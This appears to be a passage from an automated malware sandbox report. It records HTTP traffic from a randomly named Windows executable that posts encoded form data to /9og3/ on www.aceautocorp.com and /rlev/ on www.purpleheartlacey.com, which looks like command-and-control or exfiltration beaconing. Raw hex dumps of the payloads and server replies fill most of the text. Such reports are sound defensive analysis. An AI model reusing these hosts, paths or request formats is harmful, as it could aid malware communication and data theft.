                                                          Sep 11, 2024 22:05:08.549135923 CEST1236INData Raw: 34 8d d6 eb d6 15 d1 55 e3 b5 df 32 f2 d7 0c c4 cd 6d af 66 3a 9e fd e2 fa c1 e3 73 d7 ca e1 ce a6 eb c4 0a 41 a7 dc 94 f4 e1 ca 4c 06 05 eb 4f f2 b3 d2 1c 7a 9a 8e d9 63 3d 38 e2 90 47 8d 8f e8 af e4 c5 33 67 ee 25 66 2c b4 81 42 26 fa e0 0e f0
                                                          Data Ascii: 4U2mf:sALOzc=8G3g%f,B&<V:heV[o%Vd1'6OL7tU{!`CupU=Fi}or `~W`L?zY|"9kpb%'}00Mf
                                                          Sep 11, 2024 22:05:08.549160004 CEST1236INHTTP/1.1 404 Not Found
                                                          Date: Wed, 11 Sep 2024 20:05:07 GMT
                                                          Server: Apache
                                                          X-Powered-By: PHP/8.1.29
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                          Link: <http://aceautocorp.com/wp-json/>; rel="https://api.w.org/"
                                                          Upgrade: h2,h2c
                                                          Connection: Upgrade, close
                                                          Vary: Accept-Encoding
                                                          Content-Encoding: br
                                                          Content-Length: 10066
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 13 7f d0 14 91 9a f4 43 40 45 60 dc c4 c7 3a cf f7 ff 7b 53 fb 6f fb e7 eb 46 39 8d 45 0a 18 d0 b2 55 6e 3b e9 2c 99 65 4b 3b 6f 49 72 f2 b0 84 6c a6 b2 d0 01 bc e4 69 f4 f7 fe b2 de 9f 0d 7c c6 10 d8 91 43 e0 59 c9 9c 01 71 38 ff 9c 73 ef fd 7e d0 5d f5 5a 1a 95 5b 54 ee 19 8d 5d 1a cd 07 69 60 97 ef 3d 17 de eb d7 af 5b fc 57 8b 0c 59 60 c4 24 71 12 6b 8c 3d bb 26 0a 1d a4 2e 07 51 e2 c7 50 6d b6 9f 74 df 20 22 a2 22 6a d2 ee 35 5c c7 47 2d f2 11 31 b6 59 f8 61 32 54 33 19 db e9 8f 04 4e 2c 23 85 4a f0 7d 8b c3 2c b9 f7 95 58 4f 50 d4 9a 69 fb 18 9a ed e1 66 a8 e9 09 e9 83 ef a2 04 0c 6d 96 5c 03 26 9d ba 0e d4 30 c1 c1 3c cd a2 28 db 47 ea 20 d9 e5 5e 62 b8 94 94 42 40 0b 9d 83 a2 ad 0e 77 18 43 6c 29 75 1b 35 c7 a5 3f c5 ab d4 1f 71 ab 97 a9 d5 41 5e ce 81 31 44 c6 58 c6 65 3c e3 95 67 8a 2f b0 6f 17 0c c6 03 bb 22 90 dd 3b e6 bc 82 8f 8d 82 8f 47 6f 20 75 b4 b3 9e dd df f2 5d af 87 af 60 55 5f af da c1 61 be 1c 9d f2 cd 7e 75 e2 86 f3 ac d7 b2 51 f7 9b b0 61 c7 09 1e 14 9a f2 58 21 e0 68 dc 08 [TRUNCATED]
                                                          Data Ascii: C@E`:{SoF9EUn;,eK;oIrli|CYq8s~]Z[T]i`=[WY`$qk=&.QPmt ""j5\G-1Ya2T3N,#J},XOPifm\&0<(G ^bB@wCl)u5?qA^1DXe<g/o";Go u]`U_a~uQaX!hr)dj\Z<Ea#DA8Af)p<[?(sPHGtiyNiL5e4zZguuAk@wuw}Fwz9Fa34{ay$#LIOiE'eT\-WXC-0D_p^^j<LPzS6>g+.e*(?Si3<xcNQW6E{=Bgc=yE'j|06r8IGsr'z+.>aVdG5Tt|qy?I/t%C^9HOs>15G*z45BJO6cuS{:HeZ-_/t|


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          31192.168.2.1049739198.12.241.35804832C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:05:10.073736906 CEST1768OUTPOST /9og3/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.aceautocorp.com
                                                          Origin: http://www.aceautocorp.com
                                                          Content-Length: 1233
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.aceautocorp.com/9og3/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 62 46 47 58 47 54 64 58 3d 55 44 4d 4d 6e 34 56 34 4d 6e 41 6d 71 4e 69 34 78 65 30 58 6e 4a 75 4e 73 46 33 63 77 4f 73 58 64 44 69 79 4e 78 46 71 37 78 43 39 32 34 72 78 72 68 56 6d 36 6d 4f 38 6a 36 4c 6b 46 52 6f 31 50 59 78 6d 38 32 62 74 4c 2b 51 45 74 66 74 30 34 36 37 38 6e 6d 68 53 59 67 31 6f 68 71 44 46 4f 79 79 4a 78 75 30 6e 32 70 74 79 59 39 4a 57 39 66 48 49 66 6d 62 71 45 62 6c 69 74 45 66 66 52 78 72 76 4e 78 34 55 6e 7a 47 34 34 4c 68 74 6a 74 41 32 44 4f 71 44 6a 46 6f 39 31 59 2b 62 32 6c 67 38 62 73 65 57 7a 68 39 58 6f 71 42 4e 56 47 74 74 65 6e 43 4d 31 45 62 61 33 31 55 4b 44 56 4e 61 43 69 6a 69 4d 45 48 45 78 71 63 39 6b 67 45 77 78 4d 49 6c 73 51 6c 55 77 62 76 77 5a 4a 4c 66 6d 59 35 69 77 7a 7a 31 41 4c 73 39 34 39 67 45 54 48 41 73 67 6d 6d 6e 6e 56 75 42 6c 36 31 75 46 6c 54 58 32 78 53 33 44 76 4d 6f 52 37 38 33 54 61 68 78 4a 39 71 71 45 52 62 33 33 6a 66 38 30 6c 49 55 42 34 52 67 76 4d 35 4e 77 35 76 62 65 67 78 70 72 6f 48 48 47 37 70 70 41 53 66 2f 67 62 4d 44 33 [TRUNCATED]
                                                          Data Ascii: bFGXGTdX=UDMMn4V4MnAmqNi4xe0XnJuNsF3cwOsXdDiyNxFq7xC924rxrhVm6mO8j6LkFRo1PYxm82btL+QEtft04678nmhSYg1ohqDFOyyJxu0n2ptyY9JW9fHIfmbqEblitEffRxrvNx4UnzG44LhtjtA2DOqDjFo91Y+b2lg8bseWzh9XoqBNVGttenCM1Eba31UKDVNaCijiMEHExqc9kgEwxMIlsQlUwbvwZJLfmY5iwzz1ALs949gETHAsgmmnnVuBl61uFlTX2xS3DvMoR783TahxJ9qqERb33jf80lIUB4RgvM5Nw5vbegxproHHG7ppASf/gbMD3DdC5+LqZbxVurhsWMQeCC7xIpNRYZbuaxh5NEP6LxYhojQPrVYX9FU3cB0916dlJR/qLNTGAs2ubGiUFP1zqy6dN2PLk3WBgNxMliNeombdKKOrKEvbUlbu//2QU8ZwUvoGViEUQ5JvOTf1/g48CMmeIxTaodvNOMwjN/vxiYIXzQzgLUMi+ZCPz42HgUlWy1IrpxwgDTblm6sLiWmyA+N0OYjpfPP5Zba1dWbgnb3m15AMlz3aTyPZDF9L5q7UewCrj4CPqiwhMrT72vT2zCM2/+lEfoWdwUBFYZPDTjdd7crSVpybUULzA2Zhi62ixT8rZ3ifC7DMao4UwXgdulJvLAY0/3KL3grrnPdhx99xf7EplqgSbmImONnBL23RgM0CeeSM8fmzu24HPuNAyMxgBmdty2cGe0s5CBIIVuBTUZNBTKEJtj51U4qkADSouN7PbcOxRsEDMMZM91BxozYepLJRqSf5XYtBNc7gG7vaWHmtNc4NLFyhVXrreSyApJwKvSZKaNUnt0+4ZNwkbEr56AwRhF/wi5dLxGRhMfefhqHPJqGVvmj6asN4rKU4ffdWOKwTKph1aFtpdfoJAU/OBwcvFF3fh8R8BgqpAG5AnE6pOyekkWxYk8OG1VZjxlK0pMja84UyacPoVEgh58TZcLPGWTl7rV/ [TRUNCATED]
                                                          Sep 11, 2024 22:05:10.877616882 CEST1236INHTTP/1.1 404 Not Found
                                                          Date: Wed, 11 Sep 2024 20:05:10 GMT
                                                          Server: Apache
                                                          X-Powered-By: PHP/8.1.29
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                          Link: <http://aceautocorp.com/wp-json/>; rel="https://api.w.org/"
                                                          Upgrade: h2,h2c
                                                          Connection: Upgrade, close
                                                          Vary: Accept-Encoding
                                                          Content-Encoding: br
                                                          Content-Length: 10066
                                                          Content-Type: text/html; charset=UTF-8
                                                          Data Raw: 13 7f d0 14 91 9a f4 43 40 45 60 dc c4 c7 3a cf f7 ff 7b 53 fb 6f fb e7 eb 46 39 8d 45 0a 18 d0 b2 55 6e 3b e9 2c 99 65 4b 3b 6f 49 72 f2 b0 84 6c a6 b2 d0 01 bc e4 69 f4 f7 fe b2 de 9f 0d 7c c6 10 d8 91 43 e0 59 c9 9c 01 71 38 ff 9c 73 ef fd 7e d0 5d f5 5a 1a 95 5b 54 ee 19 8d 5d 1a cd 07 69 60 97 ef 3d 17 de eb d7 af 5b fc 57 8b 0c 59 60 c4 24 71 12 6b 8c 3d bb 26 0a 1d a4 2e 07 51 e2 c7 50 6d b6 9f 74 df 20 22 a2 22 6a d2 ee 35 5c c7 47 2d f2 11 31 b6 59 f8 61 32 54 33 19 db e9 8f 04 4e 2c 23 85 4a f0 7d 8b c3 2c b9 f7 95 58 4f 50 d4 9a 69 fb 18 9a ed e1 66 a8 e9 09 e9 83 ef a2 04 0c 6d 96 5c 03 26 9d ba 0e d4 30 c1 c1 3c cd a2 28 db 47 ea 20 d9 e5 5e 62 b8 94 94 42 40 0b 9d 83 a2 ad 0e 77 18 43 6c 29 75 1b 35 c7 a5 3f c5 ab d4 1f 71 ab 97 a9 d5 41 5e ce 81 31 44 c6 58 c6 65 3c e3 95 67 8a 2f b0 6f 17 0c c6 03 bb 22 90 dd 3b e6 bc 82 8f 8d 82 8f 47 6f 20 75 b4 b3 9e dd df f2 5d af 87 af 60 55 5f af da c1 61 be 1c 9d f2 cd 7e 75 e2 86 f3 ac d7 b2 51 f7 9b b0 61 c7 09 1e 14 9a f2 58 21 e0 68 dc 08 [TRUNCATED]
                                                          Data Ascii: C@E`:{SoF9EUn;,eK;oIrli|CYq8s~]Z[T]i`=[WY`$qk=&.QPmt ""j5\G-1Ya2T3N,#J},XOPifm\&0<(G ^bB@wCl)u5?qA^1DXe<g/o";Go u]`U_a~uQaX!hr)dj\Z<Ea#DA8Af)p<[?(sPHGtiyNiL5e4zZguuAk@wuw}Fwz9Fa34{ay$#LIOiE'eT\-WXC-0D_p^^j<LPzS6>g+.e*(?Si3<xcNQW6E{=Bgc=yE'j|06r8IGsr'z+.>aVdG5Tt|qy?I/t%C^9HOs>15G*z45BJO6cuS{:HeZ-_/t|
                                                          Sep 11, 2024 22:05:10.877641916 CEST1236INData Raw: ae 8b df be 8d d9 da 26 cd fe fe aa e2 ab 26 15 94 9f b2 2c 36 f5 98 04 dd 03 e7 ba 65 b1 e5 a4 4b 85 6b 57 d6 05 a8 4a 06 51 38 d0 a6 c7 76 53 3b d9 88 34 05 ce 68 cb b7 c1 ee 57 6f 87 d1 8c a5 c0 53 fe 35 1d 64 8c 51 5b 07 f3 fd 40 cb 6a b5 c1
                                                          Data Ascii: &&,6eKkWJQ8vS;4hWoS5dQ[@jU]t/c*~hnnC5J"$4~y_|6VO%U-CIa7^,igg2/jxs+l[7(m<|
                                                          Sep 11, 2024 22:05:10.877654076 CEST448INData Raw: dc 60 08 4e d2 83 f6 74 23 4a 36 24 d3 e4 60 fe 4f 08 88 89 91 16 4d ba 79 e1 64 73 0d 59 b3 b9 8d 4c db a3 25 30 d3 54 c8 0d f3 a1 7d c5 ac de a9 fc 3a 8b d6 f7 80 1c 31 d8 57 0a d6 dc 0a ef ee bd 81 43 8d bf 73 94 56 9e d9 93 79 45 32 a0 47 04
                                                          Data Ascii: `Nt#J6$`OMydsYL%0T}:1WCsVyE2GC6y0-5cA_H#r0>,TDzSPX1)a?Us(hWiQvrub;K3^LC t&rQ)PX$
                                                          Sep 11, 2024 22:05:10.877664089 CEST1236INData Raw: 6b ce 25 cf 69 8b 59 55 40 16 19 e7 51 1f 91 8c 80 ce 59 e4 ab d6 e3 7a a9 e5 71 70 ca 1f d9 8c 27 d4 89 e9 58 57 55 02 88 78 22 f7 52 dc de ea e1 2b 89 ea c3 9d 7b 39 84 5a 78 fc a7 dc 50 5f e8 a8 6a eb 03 c7 2d 78 9e 42 9b 6e 64 df 84 9f 0d 20
                                                          Data Ascii: k%iYU@QYzqp'XWUx"R+{9ZxP_j-xBnd ;e*_ySF1OF~.d10VO6@%-@Sc5<kYWdNGXvbY%&6BKQ'}/>!R'.*A
                                                          Sep 11, 2024 22:05:10.877682924 CEST1236INData Raw: d5 d2 c9 f1 fc cb 6b a5 14 16 48 c4 30 6b 16 f1 ef ce 94 90 6f ff 30 4d 70 1b f6 5d fa a4 5b 32 51 69 eb b2 d7 ab 1c 88 37 ee e8 02 d3 a2 00 57 a3 d5 fc 57 e4 ea 94 47 65 7e 1c 91 16 f2 cf 2d e4 51 d2 aa 1d be 66 ac 65 79 8c af 59 5a 44 2a 42 21
                                                          Data Ascii: kH0ko0Mp][2Qi7WWGe~-QfeyYZD*B!=+?7%D17Zny{+:)_f+[m9}T'M3f&5uCFan)rX&"VOmB^/Xyw"*(i?
                                                          Sep 11, 2024 22:05:10.877700090 CEST448INData Raw: 70 2a fc e9 59 6d 8f ee ab 31 7f 40 84 39 17 59 51 ec 18 d6 f0 42 e8 3e 9d 26 38 cf b7 58 af 06 8f 58 58 1f 94 67 1f c7 fa 6b 10 e5 7b 89 53 67 58 f0 06 dc fc a2 a5 19 e6 f9 c6 29 bf 4a 65 d3 ea 06 56 e1 1c 07 af 67 e2 d4 39 e6 62 53 68 f0 c8 c1
                                                          Data Ascii: p*Ym1@9YQB>&8XXXgk{SgX)JeVg9bShWWM#EM3yEjdx3 !~EE=A?wx0|Rp%8tz>zM]ZWQqqC9<,A$+a9HcXx
                                                          Sep 11, 2024 22:05:10.877711058 CEST1236INData Raw: 67 cb 9e 74 8f 00 15 21 16 dc 9f de 69 fc 47 25 2d 0c 9f ac 80 6e f4 40 4f 60 0c 61 a8 b5 91 de 80 ca 6d c0 a4 88 43 e4 51 5a 2c 86 ea 49 46 31 3c d8 c1 d2 5f ee d7 5d ae 87 d7 c3 d6 f4 66 11 b2 09 11 c9 1a df 07 0e 7a 08 b9 df 39 51 a7 33 c2 7f
                                                          Data Ascii: gt!iG%-n@O`amCQZ,IF1<_]fz9Q3u$Y^m4<0gCe"[BOM`!BrK%tS1qub@f(Y.ar{iGv(iIl#`f#S|cp*Csh2|9LHbP+dT<\T
                                                          Sep 11, 2024 22:05:10.877726078 CEST224INData Raw: e0 88 d4 3b 71 b6 a7 50 bc dd c3 08 cd 35 75 3d 8c dd 00 e3 af c1 e4 90 12 e2 69 ac dc 11 ae ff 23 08 a7 cb 8d 50 18 fe 97 9b f3 e4 8a b9 51 08 c0 2b 73 a3 12 98 83 e6 46 31 3f be ba 5e 88 87 e1 b6 f9 d1 0d cd 83 73 2e ce 60 9c 39 df ea 19 8c 5f
                                                          Data Ascii: ;qP5u=i#PQ+sF1?^s.`9_0\<gr=7?Wt~ATdWW~O".%wb$&HN|!rCr&HN/Oq7rn|H\GGB~
                                                          Sep 11, 2024 22:05:10.877737045 CEST1236INData Raw: 0b dd 4f 6e c8 6d 75 96 17 42 63 fb ca 09 f9 3c 7c e4 83 9c 56 0f b9 20 27 e7 21 0f e4 e4 ba 4d 5a 0c ce ba 59 33 a1 d1 c4 0e 5d 02 b1 d2 55 a1 bc f0 bd db 7c 9b c1 73 7e d1 f2 26 62 8d 5b 30 53 e8 1c 23 19 8c 9a 67 6c 6d 96 d2 eb 26 8a 36 12 d6
                                                          Data Ascii: OnmuBc<|V '!MZY3]U|s~&b[0S#glm&6zi@c]aomvjGEt~-nOl3Niyp,A4hS=h1p6zAs$l4X, ZA8dp2eY>(8;sb~J$^E
                                                          Sep 11, 2024 22:05:10.877748966 CEST224INData Raw: b4 25 e3 17 04 5a 04 57 9c 70 15 b0 95 9c 53 42 e3 dc 0b c3 c9 e4 85 e7 64 8d f0 94 1c c2 40 2a 13 a5 27 84 1a e5 68 8b c1 2d 91 c6 66 13 77 96 63 b0 39 8a e9 bb e3 85 20 e8 50 da ed 18 a8 22 04 2c e7 96 83 df 13 d3 75 3b 4c 85 c3 db b8 06 bb 4d
                                                          Data Ascii: %ZWpSBd@*'h-fwc9 P",u;LMF#5?\mmd<B\vTxA=(BQ<rED*SFGXN6=%s]V@<n<>t?5]s
                                                          Sep 11, 2024 22:05:10.882621050 CEST1236INData Raw: 34 8d d6 eb d6 15 d1 55 e3 b5 df 32 f2 d7 0c c4 cd 6d af 66 3a 9e fd e2 fa c1 e3 73 d7 ca e1 ce a6 eb c4 0a 41 a7 dc 94 f4 e1 ca 4c 06 05 eb 4f f2 b3 d2 1c 7a 9a 8e d9 63 3d 38 e2 90 47 8d 8f e8 af e4 c5 33 67 ee 25 66 2c b4 81 42 26 fa e0 0e f0
                                                          Data Ascii: 4U2mf:sALOzc=8G3g%f,B&<V:heV[o%Vd1'6OL7tU{!`CupU=Fi}or `~W`L?zY|"9kpb%'}00Mf


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          32192.168.2.1049740198.12.241.35804832C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:05:12.608148098 CEST462OUTGET /9og3/?bFGXGTdX=ZBkskPBELyIjvtDi08MWm9rbu3iLorcPFzn2FRxS1jOC36b61Sx96mOK+r72OxgWH8wd7wLlO4AB5vUmoL6nk1FBVggKsZuxPhO/hPMpvJNZBalqpQ==&M87d=RDddFbF8 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-us
                                                          Host: www.aceautocorp.com
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Sep 11, 2024 22:05:13.260107994 CEST539INHTTP/1.1 301 Moved Permanently
                                                          Date: Wed, 11 Sep 2024 20:05:13 GMT
                                                          Server: Apache
                                                          X-Powered-By: PHP/8.1.29
                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                          X-Redirect-By: WordPress
                                                          Upgrade: h2,h2c
                                                          Connection: Upgrade, close
                                                          Location: http://aceautocorp.com/9og3/?bFGXGTdX=ZBkskPBELyIjvtDi08MWm9rbu3iLorcPFzn2FRxS1jOC36b61Sx96mOK+r72OxgWH8wd7wLlO4AB5vUmoL6nk1FBVggKsZuxPhO/hPMpvJNZBalqpQ==&M87d=RDddFbF8
                                                          Vary: Accept-Encoding
                                                          Content-Length: 0
                                                          Content-Type: text/html; charset=UTF-8


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          33192.168.2.104974191.195.240.19804832C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:05:18.328668118 CEST746OUTPOST /rlev/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.purpleheartlacey.com
                                                          Origin: http://www.purpleheartlacey.com
                                                          Content-Length: 197
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.purpleheartlacey.com/rlev/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 62 46 47 58 47 54 64 58 3d 62 71 64 78 30 48 48 75 48 45 52 44 70 66 4f 36 37 4d 35 44 41 66 74 53 42 6c 30 62 33 56 41 77 49 6a 78 7a 47 61 32 78 4f 70 47 67 31 35 4d 58 35 4b 44 72 37 6d 4e 49 73 54 47 56 38 46 63 42 54 47 44 65 31 5a 38 66 74 37 68 38 67 39 46 65 53 65 72 2b 77 65 59 49 4d 66 48 67 66 5a 58 6e 73 6c 52 79 77 51 32 69 76 43 70 4e 59 4f 59 6d 68 4d 6c 6f 63 45 6a 63 4a 31 34 7a 46 56 2f 2f 61 71 78 66 31 46 58 6d 61 4e 6a 4c 46 4f 61 38 72 6f 79 4c 30 39 7a 4f 42 78 45 45 44 62 46 43 74 5a 41 6d 35 78 6d 43 50 78 57 59 6a 55 44 77 54 45 62 35 37 41 57 56 49 59 4a 6f
                                                          Data Ascii: bFGXGTdX=bqdx0HHuHERDpfO67M5DAftSBl0b3VAwIjxzGa2xOpGg15MX5KDr7mNIsTGV8FcBTGDe1Z8ft7h8g9FeSer+weYIMfHgfZXnslRywQ2ivCpNYOYmhMlocEjcJ14zFV//aqxf1FXmaNjLFOa8royL09zOBxEEDbFCtZAm5xmCPxWYjUDwTEb57AWVIYJo
                                                          Sep 11, 2024 22:05:18.997102976 CEST208INHTTP/1.1 403 Forbidden
                                                          content-length: 93
                                                          cache-control: no-cache
                                                          content-type: text/html
                                                          connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          34192.168.2.104974291.195.240.19804832C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:05:20.858273983 CEST770OUTPOST /rlev/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.purpleheartlacey.com
                                                          Origin: http://www.purpleheartlacey.com
                                                          Content-Length: 221
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.purpleheartlacey.com/rlev/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 62 46 47 58 47 54 64 58 3d 62 71 64 78 30 48 48 75 48 45 52 44 72 2b 65 36 34 76 52 44 4a 66 74 56 4e 46 30 62 73 6c 42 59 49 6a 39 7a 47 62 69 68 50 62 53 67 31 63 77 58 34 4c 44 72 34 6d 4e 49 6b 7a 47 4d 68 31 63 65 54 47 4f 70 31 64 38 66 74 37 46 38 67 38 31 65 53 4a 33 39 78 4f 59 4b 41 2f 48 69 52 35 58 6e 73 6c 52 79 77 51 53 59 76 43 78 4e 66 2b 49 6d 67 6f 35 72 43 55 6a 62 4f 31 34 7a 4f 31 2f 37 61 71 77 49 31 42 57 44 61 49 6e 4c 46 4b 53 38 72 39 65 49 74 74 7a 41 50 52 46 54 4b 4f 5a 47 74 62 6b 46 77 52 4f 2f 57 44 4f 65 74 56 69 33 43 56 36 75 6f 33 4b 62 47 65 38 43 73 77 41 62 55 34 43 6b 76 5a 6c 68 56 56 75 6d 42 44 79 36 54 51 3d 3d
                                                          Data Ascii: bFGXGTdX=bqdx0HHuHERDr+e64vRDJftVNF0bslBYIj9zGbihPbSg1cwX4LDr4mNIkzGMh1ceTGOp1d8ft7F8g81eSJ39xOYKA/HiR5XnslRywQSYvCxNf+Imgo5rCUjbO14zO1/7aqwI1BWDaInLFKS8r9eIttzAPRFTKOZGtbkFwRO/WDOetVi3CV6uo3KbGe8CswAbU4CkvZlhVVumBDy6TQ==
                                                          Sep 11, 2024 22:05:21.677721024 CEST208INHTTP/1.1 403 Forbidden
                                                          content-length: 93
                                                          cache-control: no-cache
                                                          content-type: text/html
                                                          connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          35192.168.2.104974391.195.240.19804832C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:05:23.389415026 CEST1783OUTPOST /rlev/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.purpleheartlacey.com
                                                          Origin: http://www.purpleheartlacey.com
                                                          Content-Length: 1233
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.purpleheartlacey.com/rlev/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 62 46 47 58 47 54 64 58 3d 62 71 64 78 30 48 48 75 48 45 52 44 72 2b 65 36 34 76 52 44 4a 66 74 56 4e 46 30 62 73 6c 42 59 49 6a 39 7a 47 62 69 68 50 62 71 67 31 4a 38 58 36 73 58 72 35 6d 4e 49 75 54 47 52 68 31 64 43 54 48 6d 74 31 64 77 51 74 39 42 38 68 61 4a 65 46 4d 44 39 37 4f 59 4b 66 50 48 6a 66 5a 58 79 73 6c 68 32 77 51 43 59 76 43 78 4e 66 34 6b 6d 70 63 6c 72 41 55 6a 63 4a 31 34 2f 46 56 2f 66 61 71 70 39 31 42 61 35 5a 38 54 4c 45 72 75 38 74 50 6d 49 6c 74 7a 43 4d 52 46 62 4b 4f 63 59 74 62 34 4a 77 52 4b 52 57 41 75 65 74 78 69 74 61 68 4b 33 30 78 53 6c 42 2b 6f 59 68 6b 67 6f 56 49 76 76 76 39 4a 2b 46 6b 53 30 4c 52 36 30 49 56 44 56 78 4b 43 55 51 31 48 42 6b 55 52 6b 61 69 36 64 7a 4c 78 45 77 6a 6d 34 57 44 54 44 32 79 56 66 69 4c 4d 42 4f 65 56 4e 79 33 2f 74 53 74 69 72 51 53 67 4f 42 6d 31 45 71 50 39 77 31 4d 52 6f 46 57 4c 77 38 39 59 6b 73 57 2b 6d 30 35 6b 6d 70 72 6a 5a 50 61 32 58 54 43 56 35 4a 79 78 73 62 6f 2b 54 45 76 68 78 41 75 34 69 6e 49 62 6c 7a 37 78 52 4c [TRUNCATED]
                                                          Data Ascii: 